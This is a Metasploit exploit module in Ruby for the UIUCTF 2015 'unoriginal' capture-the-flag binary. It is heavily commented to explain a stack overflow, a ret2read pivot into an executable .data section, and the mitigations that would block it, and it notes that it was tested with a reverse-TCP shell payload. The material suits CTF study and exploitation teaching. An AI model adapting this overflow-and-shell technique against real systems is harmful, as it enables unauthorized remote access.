##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Framework core: provides Msf::Exploit::Remote, the Tcp mixin, Opt::RPORT,
# MSF_LICENSE and the ARCH_X86 constant used by the module below.
require 'msf/core'
# Exploit module for the UIUCTF 2015 "unoriginal" pwn challenge (a CTF
# training binary, 32-bit Linux).
#
# Mechanism, as written below: a 13-byte stack overflow reaches the saved
# frame pointer and return address; RET is redirected to an existing read()
# call inside the binary (a single-gadget "ret2read"), which stages the
# Metasploit payload into the .data section. The original author notes that
# .data is mapped rwx, which is why execution can then continue there.
#
# Preconditions this code hard-codes (and the mitigations that remove them):
#   * absolute addresses for .data and the read() gadget, so the binary must
#     load at a fixed base -- PIE/ASLR would invalidate both constants;
#   * a writable AND executable .data mapping -- NX / W^X would stop the
#     staged payload from running;
#   * no stack canary between the local buffer and the saved frame pointer /
#     return address, otherwise the overflow would abort the process.
class Metasploit4 < Msf::Exploit::Remote
  # Plain TCP transport: gives `connect` and `sock` used in #exploit.
  include Msf::Exploit::Remote::Tcp

  # Module metadata and options. Only the remote port is registered
  # (default 1235); RHOST comes from the Tcp mixin.
  def initialize
    super(
      'Name' => 'uiuctf unoriginal',
      'Description' => %q{
This module exploits the UIUCTF 2015 pwn - unoriginal challenge.
      },
      'Author' => 'jgor',
      'Arch' => ARCH_X86,
      'Platform' => 'linux',
      'License' => MSF_LICENSE,
      'Targets' =>
        [
          # Single target with no per-target options: the addresses below
          # are fixed in #exploit rather than supplied per target.
          [ 'Automatic', {} ],
        ]
    )
    register_options(
      [
        Opt::RPORT(1235)
      ],
      self.class
    )
  end

  # Two writes over one TCP connection:
  #   1. the overflow that pivots the frame pointer into .data and returns
  #      into the binary's own read() call with controlled arguments;
  #   2. the data that read() then copies into .data -- a return address
  #      followed by the encoded payload.
  # All addresses are for this specific challenge binary and are meaningless
  # against any other build.
  def exploit
    dest = 0x08049748 # start of .data
    read_gadget = 0x0804843f # read() call within func()
    fd = 0
    # Bytes the staged read() is asked for: payload plus the 4-byte address
    # written ahead of it (the extra byte beyond that is not explained here).
    read_count = payload.encoded.length + 5
    connect
    buf = ''
    # overflow buffer
    buf << "\x41" * 13
    # set up frame pointer
    # Points the saved EBP just below .data so that, after read() returns and
    # the function epilogue runs, the stack is effectively relocated into
    # .data (presumably leave/ret semantics; the binary is not on this page).
    buf << [dest-4].pack('L')
    # overwrite RET -> jump to existing read() call
    buf << [read_gadget].pack('L')
    # set up args to read()
    buf << [fd].pack('N') # file descriptor 0
    buf << [dest].pack('L') # start of .data (mem range is rwx)
    buf << [read_count].pack('N') # count to read
    sock.put(buf)
    buf = ''
    # return to payload 4 bytes ahead
    # First word landing in .data is consumed as the next return address and
    # sends execution to the bytes that follow it.
    buf << [dest+4].pack('L')
    # msf payload (tested with linux/x86/shell/reverse_tcp)
    buf << payload.encoded
    sock.put(buf)
  end
end